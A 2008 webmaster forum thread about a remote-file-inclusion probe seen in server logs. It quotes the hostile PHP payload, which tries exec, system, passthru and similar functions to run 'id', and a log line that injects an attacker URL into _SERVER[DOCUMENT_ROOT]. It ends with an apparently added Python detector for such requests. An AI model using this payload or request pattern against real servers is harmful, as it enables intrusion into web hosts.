GoFuckYourself.com - Adult Webmaster Forum


directfiesta 08-23-2008 01:51 PM

Who are TOPYN.COM and why they have this code on their site ????
 
http://www.topyn.com/ips.txt

PHP Code:

<?php
echo "Mic22";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
  $res = '';
  if (!empty($cfe)){
    if(function_exists('exec')){
      @exec($cfe,$res);
      $res = join("\n",$res);
    }
    elseif(function_exists('shell_exec')){
      $res = @shell_exec($cfe);
    }
    elseif(function_exists('system')){
      @ob_start();
      @system($cfe);
      $res = @ob_get_contents();
      @ob_end_clean();
    }
    elseif(function_exists('passthru')){
      @ob_start();
      @passthru($cfe);
      $res = @ob_get_contents();
      @ob_end_clean();
    }
    elseif(@is_resource($f = @popen($cfe,"r"))){
      $res = "";
      while(!@feof($f)) { $res .= @fread($f,1024); }
      @pclose($f);
    }
  }
  return $res;
}
exit;

A few entries in my paysite logs .... as well as a ton listed on google : view search

Hacking shit again ????

fatfoo 08-23-2008 02:45 PM

could be hacking shit again

bobby666 08-23-2008 02:57 PM

thanks, now i have a virus alert on my pc

directfiesta 08-23-2008 03:34 PM

Quote:

Originally Posted by bobby666 (Post 14652498)
thanks, now i have a virus alert on my pc

First, script was posted ... and there is no virus in that ....

Quote:

80.93.54.47 ... GET /index.php?_SERVER[DOCUMENT_ROOT]=http://www.topyn.com/ips.txt? HTTP/1.1

That referenced URL still works, so if you want you can retrieve the 'exploit' code. But all it apparently does is to try various methods to execute "id", probably to locate web servers that are vulnerable and maybe even running as "root" user.

Obviously this is a brute force; that site doesn't have an index.php.

Is that anything new? Or is it just some script kiddie trying to re-use an aged exploit? But on the other hand, I haven't seen such a suhosin alert in months. Anybody know which PHP script might be vulnerable to this attack vector?


[Update: I've received two mails pointing out that such vulnerabilities are found in some PHP apps every now and then, so it might just be some script kiddie scanning brute force once more. Supposedly this cannot be exploited when register_globals is off and/or suhosin is used.]

AVG:

"Scan ""Shell extension scan"" was finished."
"Infections found:";"0"
"Infected objects removed or healed:";"0"
"Not removed or healed:";"0"
"Spyware found:";"0"
"Spyware removed:";"0"
"Not removed:";"0"
"Warnings count:";"0"
"Information count:";"0"
"Scan started:";"Saturday, August 23, 2008, 6:35:38 PM"
"Scan finished:";"Saturday, August 23, 2008, 6:35:39 PM (less than one second)"
"Total object scanned:";"1"
"User who launched the scan:";"User"
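
For anyone who wants to check their own logs for the request pattern quoted above, here is a small log filter, added as an example and not part of the original thread. It flags query parameters that try to set a PHP superglobal such as `_SERVER[DOCUMENT_ROOT]` and marks the ones whose value is a remote URL; the function names and every sample line after the first are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# PHP superglobals; a request parameter named after one is a strong attack signal.
SUPERGLOBALS = {"GLOBALS", "_SERVER", "_GET", "_POST", "_COOKIE",
                "_FILES", "_ENV", "_REQUEST", "_SESSION"}
REMOTE_VALUE = re.compile(r"^(?:https?|ftps?)://", re.IGNORECASE)
# Request part of an access-log line, with or without surrounding quotes.
REQUEST = re.compile(r"\b(?:GET|POST|HEAD) (?P<target>\S+) HTTP/\d\.\d")

# First line is the request quoted in the thread (its "..." elision kept);
# the rest are constructed, using documentation addresses and example domains.
SAMPLE_LOG = [
    "80.93.54.47 ... GET /index.php?_SERVER[DOCUMENT_ROOT]=http://www.topyn.com/ips.txt? HTTP/1.1",
    '192.0.2.10 - - [23/Aug/2008:13:40:02 -0700] "GET /index.php?page=2&sort=asc HTTP/1.1" 200 5120',
    '198.51.100.7 - - [23/Aug/2008:13:41:17 -0700] '
    '"GET /a.php?_SERVER%5BDOCUMENT_ROOT%5D=HTTP://example.net/x.txt HTTP/1.0" 404 210',
    '192.0.2.44 - - [23/Aug/2008:13:42:55 -0700] "GET /view.php?GLOBALS[cfg]=1 HTTP/1.1" 200 99',
]

def superglobal_params(target):
    """Yield (name, value, is_remote) for parameters that target a superglobal."""
    _, _, query = target.partition("?")
    # parse_qsl percent-decodes, so %5B/%5D-encoded brackets are caught too.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name.split("[", 1)[0] in SUPERGLOBALS:
            yield name, value, bool(REMOTE_VALUE.match(value))

def scan(lines):
    """Return (client, name, value, is_remote) for every suspicious request."""
    hits = []
    for line in lines:
        m = REQUEST.search(line)
        if not m:
            continue
        client = line.split(" ", 1)[0]
        for name, value, is_remote in superglobal_params(m.group("target")):
            hits.append((client, name, value, is_remote))
    return hits

if __name__ == "__main__":
    for client, name, value, is_remote in scan(SAMPLE_LOG):
        kind = "remote include attempt" if is_remote else "superglobal overwrite"
        print(f"{client}  {kind}: {name}={value}")
```

A hit only shows that someone probed for the flaw; whether the include could succeed depends on the PHP settings mentioned in the update above (register_globals, suhosin).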

